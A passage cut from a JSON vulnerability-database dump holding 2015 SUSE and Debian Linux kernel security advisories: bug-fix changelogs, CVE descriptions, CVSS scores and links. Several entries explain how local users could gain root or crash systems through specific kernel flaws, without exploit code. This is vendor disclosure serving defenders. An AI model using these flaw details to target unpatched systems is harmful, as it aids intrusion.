ceph_osd_request::r_{oloc,oid} to r_base_{oloc,oid}\n (bsc#918255).\n - libceph: replace ceph_calc_ceph_pg() with ceph_oloc_oid_to_pg()\n (bsc#918255).\n - libceph: start 
using oloc abstraction (bsc#918255).\n - libceph: take map_sem for read in handle_reply() (bsc#918255).\n - libceph: update ceph_features.h (bsc#918255).\n - libceph: use CEPH_MON_PORT when the specified port is 0 (bsc#918255).\n - locking/mutex: Explicitly mark task as running after wakeup (mutex\n scalability).\n - locking/osq: No need for load/acquire when acquire-polling (mutex\n scalability).\n - locking/rtmutex: Optimize setting task running after being blocked\n (mutex scalability).\n - mm/compaction: fix wrong order check in compact_finished() (VM\n Performance, bnc#904177).\n - mm/compaction: stop the isolation when we isolate enough freepage (VM\n Performance, bnc#904177).\n - mm: fix negative nr_isolated counts (VM Performance).\n - mutex-debug: Always clear owner field upon mutex_unlock() (mutex bugfix).\n - net: 8021q/bluetooth/bridge/can/ceph: Remove extern from function\n prototypes (bsc#918255).\n - net: allow macvlans to move to net namespace (bnc#915660).\n - net:socket: set msg_namelen to 0 if msg_name is passed as NULL in msghdr\n struct from userland (bnc#900270).\n - nfs_prime_dcache needs fh to be set (bnc#908069 bnc#896484).\n - ocfs2: remove filesize checks for sync I/O journal commit (bnc#800255).\n Update references.\n - powerpc/xmon: Fix another endiannes issue in RTAS call from xmon\n (bsc#915188).\n - pvscsi: support suspend/resume (bsc#902286).\n - random: account for entropy loss due to overwrites\n (bsc#904883,bsc#904901).\n - random: allow fractional bits to be tracked (bsc#904883,bsc#904901).\n - random: statically compute poolbitshift, poolbytes, poolbits\n (bsc#904883,bsc#904901).\n - rbd: add "^A" sysfs rbd device attribute (bsc#918255).\n - rbd: add support for single-major device number allocation scheme\n (bsc#918255).\n - rbd: enable extended devt in single-major mode (bsc#918255).\n - rbd: introduce rbd_dev_header_unwatch_sync() and switch to it\n (bsc#918255).\n - rbd: rbd_device::dev_id is an int, format it as such 
(bsc#918255).\n - rbd: refactor rbd_init() a bit (bsc#918255).\n - rbd: switch to ida for rbd id assignments (bsc#918255).\n - rbd: tear down watch request if rbd_dev_device_setup() fails\n (bsc#918255).\n - rbd: tweak "loaded" message and module description (bsc#918255).\n - rbd: wire up is_visible() sysfs callback for rbd bus (bsc#918255).\n - rpm/kernel-binary.spec.in: Own the modules directory in the devel\n package (bnc#910322)\n - s390/dasd: fix infinite loop during format (bnc#914291, LTC#120608).\n - s390/dasd: remove unused code (bnc#914291, LTC#120608).\n - sched/Documentation: Remove unneeded word (mutex scalability).\n - sched/completion: Add lock-free checking of the blocking case (scheduler\n scalability).\n - scsifront: avoid acquiring same lock twice if ring is full.\n - scsifront: do not use bitfields for indicators modified under different\n locks.\n - swiotlb: Warn on allocation failure in swiotlb_alloc_coherent\n (bsc#905783).\n - uas: Add NO_ATA_1X for VIA VL711 devices (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X for 2 more Seagate disk enclosures (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X for Seagate devices with usb-id 0bc2:a013\n (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X quirk for 1 more Seagate model (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X quirk for 2 more Seagate models (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X quirk for Seagate (0bc2:ab20) drives\n (bnc#914254).\n - uas: Add a quirk for rejecting ATA_12 and ATA_16 commands (bnc#914254).\n - uas: Add missing le16_to_cpu calls to asm1051 / asm1053 usb-id check\n (bnc#914294).\n - uas: Add no-report-opcodes quirk (bnc#914254).\n - uas: Disable uas on ASM1051 devices (bnc#914294).\n - uas: Do not blacklist ASM1153 disk enclosures (bnc#914294).\n - uas: Use streams on upcoming 10Gbps / 3.1 USB (bnc#914464).\n - uas: disable UAS on Apricorn SATA dongles (bnc#914300).\n - usb-storage: support for more than 8 LUNs (bsc#906196).\n - x86, crash: Allocate enough low-mem when crashkernel=high 
(bsc#905783).\n - x86, swiotlb: Try coherent allocations with __GFP_NOWARN (bsc#905783).\n - x86/hpet: Make boot_hpet_disable extern (bnc#916646).\n - x86/intel: Add quirk to disable HPET for the Baytrail platform\n (bnc#916646).\n - x86: irq: Check for valid irq descriptor in\n check_irq_vectors_for_cpu_disable (bnc#914726).\n - xhci: Add broken-streams quirk for Fresco Logic FL1000G xhci controllers\n (bnc#914112).\n - zcrypt: Number of supported ap domains is not retrievable (bnc#914291,\n LTC#120788).\n\n", "edition": 1, "modified": "2015-03-18T22:04:55", "published": "2015-03-18T22:04:55", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00020.html", "id": "SUSE-SU-2015:0529-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:38", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2014-9529", "CVE-2015-2922", "CVE-2015-3339", "CVE-2015-3331", "CVE-2015-1421", "CVE-2014-8159", "CVE-2015-0777", "CVE-2015-3636", "CVE-2014-9683", "CVE-2015-2150", "CVE-2014-8086", "CVE-2015-2041", "CVE-2014-9419", "CVE-2015-2042"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 RealTime Extension kernel was\n updated to fix various bugs and security issues.\n\n The following vulnerabilities have been fixed:\n\n CVE-2015-3636: A missing sk_nulls_node_init() in ping_unhash() inside the\n ipv4 stack can cause crashes if a disconnect is followed by another\n connect() attempt. 
(bnc#929525)\n\n CVE-2015-3339: Race condition in the prepare_binprm function in fs/exec.c\n in the Linux kernel before 3.19.6 allows local users to gain privileges by\n executing a setuid program at a time instant when a chown to root is in\n progress, and the ownership is changed but the setuid bit is not yet\n stripped. (bnc#928130)\n\n CVE-2015-3331: The __driver_rfc4106_decrypt function in\n arch/x86/crypto/aesni-intel_glue.c in the Linux kernel before 3.19.3 does\n not properly determine the memory locations used for encrypted data, which\n allows context-dependent attackers to cause a denial of service (buffer\n overflow and system crash) or possibly execute arbitrary code by\n triggering a crypto API call, as demonstrated by use of a libkcapi test\n program with an AF_ALG(aead) socket. (bnc#927257)\n\n CVE-2015-2922: The ndisc_router_discovery function in net/ipv6/ndisc.c in\n the Neighbor Discovery (ND) protocol implementation in the IPv6 stack in\n the Linux kernel before 3.19.6 allows remote attackers to reconfigure a\n hop-limit setting via a small hop_limit value in a Router Advertisement\n (RA) message. (bnc#922583)\n\n CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux kernel before\n 3.19.2 does not prevent the TS_COMPAT flag from reaching a user-mode task,\n which might allow local users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1) fork or (2) close\n system call, as demonstrated by an attack against seccomp before 3.16.\n (bnc#926240)\n\n CVE-2015-2150: XSA-120: Xen 3.3.x through 4.5.x and the Linux kernel\n through 3.19.1 do not properly restrict access to PCI command registers,\n which might allow local guest users to cause a denial of service\n (non-maskable interrupt and host crash) by disabling the (1) memory or (2)\n I/O decoding for a PCI Express device and then accessing the device, which\n triggers an Unsupported Request (UR) response. 
(bnc#919463)\n\n CVE-2015-2042: net/rds/sysctl.c in the Linux kernel before 3.19 uses an\n incorrect data type in a sysctl table, which allows local users to obtain\n potentially sensitive information from kernel memory or possibly have\n unspecified other impact by accessing a sysctl entry. (bnc#919018)\n\n CVE-2015-2041: net/llc/sysctl_net_llc.c in the Linux kernel before 3.19\n uses an incorrect data type in a sysctl table, which allows local users to\n obtain potentially sensitive information from kernel memory or possibly\n have unspecified other impact by accessing a sysctl entry. (bnc#919007)\n\n CVE-2015-1421: Use-after-free vulnerability in the sctp_assoc_update\n function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows\n remote attackers to cause a denial of service (slab corruption and panic)\n or possibly have unspecified other impact by triggering an INIT collision\n that leads to improper handling of shared-key data. (bnc#915577)\n\n CVE-2015-0777: drivers/xen/usbback/usbback.c in linux-2.6.18-xen-3.4.0\n (aka the Xen 3.4.x support patches for the Linux kernel 2.6.18), as used\n in the Linux kernel 2.6.x and 3.x in SUSE Linux distributions, allows\n guest OS users to obtain sensitive information from uninitialized\n locations in host OS kernel memory via unspecified vectors. (bnc#917830)\n\n CVE-2014-9683: Off-by-one error in the ecryptfs_decode_from_filename\n function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux\n kernel before 3.18.2 allows local users to cause a denial of service\n (buffer overflow and system crash) or possibly gain privileges via a\n crafted filename. 
(bnc#918333)\n\n CVE-2014-9529: Race condition in the key_gc_unused_keys function in\n security/keys/gc.c in the Linux kernel through 3.18.2 allows local users\n to cause a denial of service (memory corruption or panic) or possibly have\n unspecified other impact via keyctl commands that trigger access to a key\n structure member during garbage collection of a key. (bnc#912202)\n\n CVE-2014-9419: The __switch_to function in arch/x86/kernel/process_64.c in\n the Linux kernel through 3.18.1 does not ensure that Thread Local Storage\n (TLS) descriptors are loaded before proceeding with other steps, which\n makes it easier for local users to bypass the ASLR protection mechanism\n via a crafted application that reads a TLS base address. (bnc#911326)\n\n CVE-2014-8159: The InfiniBand (IB) implementation in the Linux kernel does\n not properly restrict use of User Verbs for registration of memory\n regions, which allows local users to access arbitrary physical memory\n locations, and consequently cause a denial of service (system crash) or\n gain privileges, by leveraging permissions on a uverbs device under\n /dev/infiniband/. 
(bnc#914742)\n\n CVE-2014-8086: Race condition in the ext4_file_write_iter function in\n fs/ext4/file.c in the Linux kernel through 3.17 allows local users to\n cause a denial of service (file unavailability) via a combination of a\n write action and an F_SETFL fcntl operation for the O_DIRECT flag.\n (bnc#900881)\n\n The following non-security bugs have been fixed:\n\n * mm: exclude reserved pages from dirtyable memory (bnc#931015,\n bnc#930788).\n * mm: fix calculation of dirtyable memory (bnc#931015, bnc#930788).\n * mm/page-writeback.c: fix dirty_balance_reserve subtraction from\n dirtyable memory (bnc#931015, bnc#930788).\n * mm, oom: fix and cleanup oom score calculations (bnc#930171).\n * mm: fix anon_vma->degree underflow in anon_vma endless growing\n prevention (bnc#904242).\n * mm, slab: lock the correct nodelist after reenabling irqs\n (bnc#926439).\n * x86: irq: Check for valid irq descriptor in\n check_irq_vectors_for_cpu_disable (bnc#914726).\n * x86/mce: Introduce mce_gather_info() (bsc#914987).\n * x86/mce: Fix mce regression from recent cleanup (bsc#914987).\n * x86/mce: Update MCE severity condition check (bsc#914987).\n * x86, kvm: Remove incorrect redundant assembly constraint\n (bnc#931850).\n * x86/reboot: Fix a warning message triggered by stop_other_cpus()\n (bnc#930284).\n * x86/apic/uv: Update the UV APIC HUB check (bsc#929145).\n * x86/apic/uv: Update the UV APIC driver check (bsc#929145).\n * x86/apic/uv: Update the APIC UV OEM check (bsc#929145).\n * kabi: invalidate removed sys_elem_dir::children (bnc#919589).\n * kabi: fix for changes in the sysfs_dirent structure (bnc#919589).\n * iommu/amd: Correctly encode huge pages in iommu page tables\n (bsc#931014).\n * iommu/amd: Optimize amd_iommu_iova_to_phys for new fetch_pte\n interface (bsc#931014).\n * iommu/amd: Optimize alloc_new_range for new fetch_pte interface\n (bsc#931014).\n * iommu/amd: Optimize iommu_unmap_page for new fetch_pte interface\n (bsc#931014).\n * iommu/amd: Return 
the pte page-size in fetch_pte (bsc#931014).\n * rtc: Prevent the automatic reboot after powering off the system\n (bnc#930145)\n * rtc: Restore the RTC alarm time to the configured alarm time in BIOS\n Setup (bnc#930145, bnc#927262).\n * rtc: Add more TGCS models for alarm disable quirk (bnc#927262).\n * kernel: Fix IA64 kernel/kthread.c build woes. Hide #include\n <linux/hardirq.h> from kABI checker.\n * cpu: Correct cpu affinity for dlpar added cpus (bsc#928970).\n * proc: deal with deadlock in d_walk fix (bnc#929148, bnc#929283).\n * proc: /proc/stat: convert to single_open_size() (bnc#928122).\n * proc: new helper: single_open_size() (bnc#928122).\n * proc: speed up /proc/stat handling (bnc#928122).\n * sched: Fix potential near-infinite distribute_cfs_runtime() loop\n (bnc#930786)\n * tty: Correct tty buffer flush (bnc#929647).\n * tty: hold lock across tty buffer finding and buffer filling\n (bnc#929647).\n * fork: report pid reservation failure properly (bnc#909684).\n * random: Fix add_timer_randomness throttling\n (bsc#904883,bsc#904901,FATE#317374).\n * random: account for entropy loss due to overwrites (FATE#317374).\n * random: allow fractional bits to be tracked (FATE#317374).\n * random: statically compute poolbitshift, poolbytes, poolbits\n (FATE#317374).\n * crypto: Limit allocation of crypto mechanisms to dialect which\n requires (bnc#925729).\n * net: relax rcvbuf limits (bug#923344).\n * udp: only allow UFO for packets from SOCK_DGRAM sockets (bnc#909309).\n * acpi / sysfs: Treat the count field of counter_show() as unsigned\n (bnc#909312).\n * acpi / osl: speedup grace period in acpi_os_map_cleanup (bnc#877456).\n * btrfs: upstream fixes from 3.18\n * btrfs: fix race when reusing stale extent buffers that leads to\n BUG_ON.\n * btrfs: btrfs_release_extent_buffer_page did not free pages of dummy\n extent (bnc#930226, bnc#916521).\n * btrfs: set error return value in btrfs_get_blocks_direct.\n * btrfs: fix off-by-one in cow_file_range_inline().\n 
* btrfs: wake up transaction thread from SYNC_FS ioctl.\n * btrfs: fix wrong fsid check of scrub.\n * btrfs: try not to ENOSPC on log replay.\n * btrfs: fix build_backref_tree issue with multiple shared blocks.\n * btrfs: add missing end_page_writeback on submit_extent_page failure.\n * btrfs: fix crash of btrfs_release_extent_buffer_page.\n * btrfs: fix race in WAIT_SYNC ioctl.\n * btrfs: fix kfree on list_head in btrfs_lookup_csums_range error\n cleanup.\n * btrfs: cleanup orphans while looking up default subvolume\n (bsc#914818).\n * btrfs: fix lost return value due to variable shadowing.\n * btrfs: abort the transaction if we fail to update the free space\n cache inode.\n * btrfs: fix scheduler warning when syncing log.\n * btrfs: add more checks to btrfs_read_sys_array.\n * btrfs: cleanup, rename a few variables in btrfs_read_sys_array.\n * btrfs: add checks for sys_chunk_array sizes.\n * btrfs: more superblock checks, lower bounds on devices and\n sectorsize/nodesize.\n * btrfs: fix setup_leaf_for_split() to avoid leaf corruption.\n * btrfs: fix typos in btrfs_check_super_valid.\n * btrfs: use macro accessors in superblock validation checks.\n * btrfs: add more superblock checks.\n * btrfs: avoid premature -ENOMEM in clear_extent_bit().\n * btrfs: avoid returning -ENOMEM in convert_extent_bit() too early.\n * btrfs: call inode_dec_link_count() on mkdir error path.\n * btrfs: fix fs corruption on transaction abort if device supports\n discard.\n * btrfs: make sure we wait on logged extents when fsycning two subvols.\n * btrfs: make xattr replace operations atomic.\n * xfs: xfs_alloc_fix_minleft can underflow near ENOSPC (bnc#913080,\n bnc#912741).\n * xfs: prevent deadlock trying to cover an active log (bsc#917093).\n * xfs: introduce xfs_bmapi_read() (bnc#891641).\n * xfs: factor extent map manipulations out of xfs_bmapi (bnc#891641).\n * nfs: Fix a regression in nfs_file_llseek() (bnc#930401).\n * nfs: do not try to use lock state when we hold a delegation\n 
(bnc#831029) - add to series.conf\n * sunrpc: Fix the execution time statistics in the face of RPC\n restarts (bnc#924271).\n * fsnotify: Fix handling of renames in audit (bnc#915200).\n * configfs: fix race between dentry put and lookup (bnc#924333).\n * fs/pipe.c: add ->statfs callback for pipefs (bsc#916848).\n * fs/buffer.c: make block-size be per-page and protected by the page\n lock (bnc#919357).\n * st: fix corruption of the st_modedef structures in st_set_options()\n (bnc#928333).\n * lpfc: Fix race on command completion (bnc#906027,bnc#889221).\n * cifs: fix use-after-free bug in find_writable_file (bnc#909477).\n * sysfs: Make sysfs_rename safe with sysfs_dirents in rbtrees\n (bnc#919589).\n * sysfs: use rb-tree for inode number lookup (bnc#919589).\n * sysfs: use rb-tree for name lookups (bnc#919589).\n * dasd: Fix inability to set a DASD device offline (bnc#927338,\n LTC#123905).\n * dasd: Fix device having no paths after suspend/resume (bnc#927338,\n LTC#123896).\n * dasd: Fix unresumed device after suspend/resume (bnc#927338,\n LTC#123892).\n * dasd: Missing partition after online processing (bnc#917120,\n LTC#120565).\n * af_iucv: fix AF_IUCV sendmsg() errno (bnc#927338, LTC#123304).\n * s390: avoid z13 cache aliasing (bnc#925012).\n * s390: enable large page support with CONFIG_DEBUG_PAGEALLOC\n (bnc#925012).\n * s390: z13 base performance (bnc#925012, LTC#KRN1514).\n * s390/spinlock: cleanup spinlock code (bnc#925012).\n * s390/spinlock: optimize spinlock code sequence (bnc#925012).\n * s390/spinlock,rwlock: always do a load-and-test first (bnc#925012).\n * s390/spinlock: refactor arch_spin_lock_wait[_flags] (bnc#925012).\n * s390/spinlock: optimize spin_unlock code (bnc#925012).\n * s390/rwlock: add missing local_irq_restore calls (bnc#925012).\n * s390/time: use stck clock fast for do_account_vtime (bnc#925012).\n * s390/kernel: use stnsm 255 instead of stosm 0 (bnc#925012).\n * s390/mm: align 64-bit PIE binaries to 4GB (bnc#925012).\n * s390/mm: 
use pfmf instruction to initialize storage keys\n (bnc#925012).\n * s390/mm: speedup storage key initialization (bnc#925012).\n * s390/memory hotplug: initialize storage keys (bnc#925012).\n * s390/memory hotplug: use pfmf instruction to initialize storage keys\n (bnc#925012).\n * s390/facilities: cleanup PFMF and HPAGE machine facility detection\n (bnc#925012).\n * powerpc/perf: Cap 64bit userspace backtraces to PERF_MAX_STACK_DEPTH\n (bsc#928142).\n * powerpc+sparc64/mm: Remove hack in mmap randomize layout\n (bsc#917839).\n * powerpc: Make chip-id information available to userspace\n (bsc#919682).\n * powerpc/mm: Fix mmap errno when MAP_FIXED is set and mapping exceeds\n the allowed address space (bsc#930669).\n * ib/ipoib: Add missing locking when CM object is deleted (bsc#924340).\n * ib/ipoib: Fix RCU pointer dereference of wrong object (bsc#924340).\n * IPoIB: Fix race in deleting ipoib_neigh entries (bsc#924340).\n * IPoIB: Fix ipoib_neigh hashing to use the correct daddr octets\n (bsc#924340).\n * IPoIB: Fix AB-BA deadlock when deleting neighbours (bsc#924340).\n * IPoIB: Fix memory leak in the neigh table deletion flow (bsc#924340).\n * ch: fixup refcounting imbalance for SCSI devices (bsc#925443).\n * ch: remove ch_mutex (bnc#925443).\n * DLPAR memory add failed on Linux partition (bsc#927190).\n * Revert "pseries/iommu: Remove DDW on kexec" (bsc#926016).\n * Revert "powerpc/pseries/iommu: remove default window before\n attempting DDW manipulation" (bsc#926016).\n * alsa: hda_intel: apply the Separate stream_tag for Sunrise Point\n (bsc#925370).\n * alsa: hda_intel: apply the Separate stream_tag for Skylake\n (bsc#925370).\n * alsa: hda_controller: Separate stream_tag for input and output\n streams (bsc#925370).\n * md: do not give up looking for spares on first failure-to-add\n (bnc#908706).\n * md: fix safe_mode buglet (bnc#926767).\n * md: do not wait for plug_cnt to go to zero (bnc#891641).\n * epoll: fix use-after-free in eventpoll_release_file 
(epoll scaling).\n * eventpoll: use-after-possible-free in epoll_create1() (bug#917648).\n * direct-io: do not read inode->i_blkbits multiple times (bnc#919357).\n * scsifront: do not use bitfields for indicators modified under\n different locks.\n * msi: also reject resource with flags all clear.\n * pvscsi: support suspend/resume (bsc#902286).\n * do not switch internal CDC device on IBM NeXtScale nx360 M5\n (bnc#913598).\n * dm: optimize use SRCU and RCU (bnc#910517).\n * uvc: work on XHCI controllers without ring expansion (bnc#915045).\n * qla2xxx: Do not crash system for sp ref count zero\n (bnc#891212,bsc#917684).\n * megaraid_sas : Update threshold based reply post host index register\n (bnc#919808).\n * bnx2x: Fix kdump when iommu=on (bug#921769).\n * Provide/Obsolete all subpackages of old flavors (bnc#925567)\n * tgcs: Ichigan 6140-x3x Integrated touchscreen is not precise\n (bnc#924142).\n\n Security Issues:\n\n * CVE-2014-8086\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8086>\n * CVE-2014-8159\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8159>\n * CVE-2014-9419\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9419>\n * CVE-2014-9529\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9529>\n * CVE-2014-9683\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9683>\n * CVE-2015-0777\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0777>\n * 
CVE-2015-1421\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1421>\n * CVE-2015-2041\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2041>\n * CVE-2015-2042\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2042>\n * CVE-2015-2150\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2150>\n * CVE-2015-2830\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2830>\n * CVE-2015-2922\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2922>\n * CVE-2015-3331\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3331>\n * CVE-2015-3339\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3339>\n * CVE-2015-3636\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3636>\n", "edition": 1, "modified": "2015-08-12T19:09:18", "published": "2015-08-12T19:09:18", "id": "SUSE-SU-2015:1376-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00007.html", "title": "Security update for the Real Time Linux Kernel (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": 
"2020-11-11T13:18:32", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2014-9730", "CVE-2014-8159", "CVE-2011-5321", "CVE-2012-6689", "CVE-2014-9729", "CVE-2014-9683", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2014-3184", "CVE-2015-2042", "CVE-2015-1805"], "description": "Package : linux-2.6\nVersion : 2.6.32-48squeeze12\nCVE ID : CVE-2011-5321 CVE-2012-6689 CVE-2014-3184 CVE-2014-8159 \n CVE-2014-9683 CVE-2014-9728 CVE-2014-9729 CVE-2014-9730\n\t\t CVE-2014-9731 CVE-2015-1805 CVE-2015-2041 CVE-2015-2042\n\t\t CVE-2015-2830 CVE-2015-2922 CVE-2015-3339 CVE-2015-4167\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\n Jiri Slaby discovered that tty_driver_lookup_tty() may leak a\n reference to the tty driver. A local user could use this flaw\n to crash the system.\n\nCVE-2012-6689\n\n Pablo Neira Ayuso discovered that non-root user-space processes\n can send forged Netlink notifications to other processes. A local\n user could use this flaw for denial of service or privilege\n escalation.\n\nCVE-2014-3184\n\n Ben Hawkes discovered that various HID drivers may over-read the\n report descriptor buffer, possibly resulting in a crash if a HID\n with a crafted descriptor is plugged in.\n\nCVE-2014-8159\n\n It was found that the Linux kernel's InfiniBand/RDMA subsystem did\n not properly sanitize input parameters while registering memory\n regions from user space via the (u)verbs API. 
A local user with\n access to a /dev/infiniband/uverbsX device could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system.\n\nCVE-2014-9683\n\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\n the allocated buffer during encrypted filename decoding, resulting\n in local denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 / CVE-2015-4167\n\n Carl Henrik Lunde discovered that the UDF implementation is\n missing several necessary length checks. A local user that can\n mount devices could use these various flaws to crash the system,\n to leak information from the kernel, or possibly for privilege\n escalation.\n\nCVE-2015-1805\n\n Red Hat discovered that the pipe iovec read and write\n implementations may iterate over the iovec twice but will modify\n the iovec such that the second iteration accesses the wrong\n memory. A local user could use this flaw to crash the system or\n possibly for privilege escalation. This may also result in data\n corruption and information leaks in pipes between non-malicious\n processes.\n\nCVE-2015-2041\n\n Sasha Levin discovered that the LLC subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n possibly allows privilege escalation from a process with\n CAP_NET_ADMIN capability; it also results in a trivial information\n leak.\n\nCVE-2015-2042\n\n Sasha Levin discovered that the RDS subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n results in a trivial information leak.\n\nCVE-2015-2830\n\n Andrew Lutomirski discovered that when a 64-bit task on an amd64\n kernel makes a fork(2) or clone(2) system call using int $0x80,\n the 32-bit compatibility flag is set (correctly) but is not\n cleared on return. 
As a result, both seccomp and audit will\n misinterpret the following system call by the task(s), possibly\n leading to a violation of security policy.\n\nCVE-2015-2922\n\n Modio AB discovered that the IPv6 subsystem would process a router\n advertisement that specifies no route but only a hop limit, which\n would then be applied to the interface that received it. This can\n result in loss of IPv6 connectivity beyond the local network.\n\n This may be mitigated by disabling processing of IPv6 router\n advertisements if they are not needed:\n sysctl net.ipv6.conf.default.accept_ra=0\n sysctl net.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\n It was found that the execve(2) system call can race with inode\n attribute changes made by chown(2). Although chown(2) clears the\n setuid/setgid bits of a file if it changes the respective owner ID,\n this race condition could result in execve(2) setting effective\n uid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167 which\nwill be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\n-- \nBen Hutchings - Debian developer, member of Linux kernel and LTS teams\n\n\n", "edition": 9, "modified": "2015-06-17T11:25:37", "published": "2015-06-17T11:25:37", "id": "DEBIAN:DLA-246-1:C824B", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00011.html", "title": "[SECURITY] [DLA 246-1] linux-2.6 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:27:56", 
"bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2014-9730", "CVE-2014-8159", "CVE-2011-5321", "CVE-2012-6689", "CVE-2014-9729", "CVE-2014-9683", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2014-3184", "CVE-2015-2042", "CVE-2015-1805"], "description": "Package : linux-2.6\nVersion : 2.6.32-48squeeze13\nCVE ID : CVE-2011-5321 CVE-2012-6689 CVE-2014-3184 CVE-2014-8159 \n CVE-2014-9683 CVE-2014-9728 CVE-2014-9729 CVE-2014-9730\n\t\t CVE-2014-9731 CVE-2015-1805 CVE-2015-2041 CVE-2015-2042\n\t\t CVE-2015-2830 CVE-2015-2922 CVE-2015-3339 CVE-2015-4167\nDebian Bug : 789037\n\nThe linux-2.6 update issued as DLA-246-1 caused regressions. This\nupdate corrects the defective patches applied in that update causing\nthese problems. For reference the original advisory text follows.\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\n Jiri Slaby discovered that tty_driver_lookup_tty() may leak a\n reference to the tty driver. A local user could use this flaw\n to crash the system.\n\nCVE-2012-6689\n\n Pablo Neira Ayuso discovered that non-root user-space processes\n can send forged Netlink notifications to other processes. A local\n user could use this flaw for denial of service or privilege\n escalation.\n\nCVE-2014-3184\n\n Ben Hawkes discovered that various HID drivers may over-read the\n report descriptor buffer, possibly resulting in a crash if a HID\n with a crafted descriptor is plugged in.\n\nCVE-2014-8159\n\n It was found that the Linux kernel's InfiniBand/RDMA subsystem did\n not properly sanitize input parameters while registering memory\n regions from user space via the (u)verbs API. 
A local user with\n access to a /dev/infiniband/uverbsX device could use this flaw to\n crash the system or, potentially, escalate their privileges on the\n system.\n\nCVE-2014-9683\n\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\n the allocated buffer during encrypted filename decoding, resulting\n in local denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 / CVE-2015-4167\n\n Carl Henrik Lunde discovered that the UDF implementation is\n missing several necessary length checks. A local user that can\n mount devices could use these various flaws to crash the system,\n to leak information from the kernel, or possibly for privilege\n escalation.\n\nCVE-2015-1805\n\n Red Hat discovered that the pipe iovec read and write\n implementations may iterate over the iovec twice but will modify\n the iovec such that the second iteration accesses the wrong\n memory. A local user could use this flaw to crash the system or\n possibly for privilege escalation. This may also result in data\n corruption and information leaks in pipes between non-malicious\n processes.\n\nCVE-2015-2041\n\n Sasha Levin discovered that the LLC subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n possibly allows privilege escalation from a process with\n CAP_NET_ADMIN capability; it also results in a trivial information\n leak.\n\nCVE-2015-2042\n\n Sasha Levin discovered that the RDS subsystem exposed some\n variables as sysctls with the wrong type. On a 64-bit kernel, this\n results in a trivial information leak.\n\nCVE-2015-2830\n\n Andrew Lutomirski discovered that when a 64-bit task on an amd64\n kernel makes a fork(2) or clone(2) system call using int $0x80,\n the 32-bit compatibility flag is set (correctly) but is not\n cleared on return. 
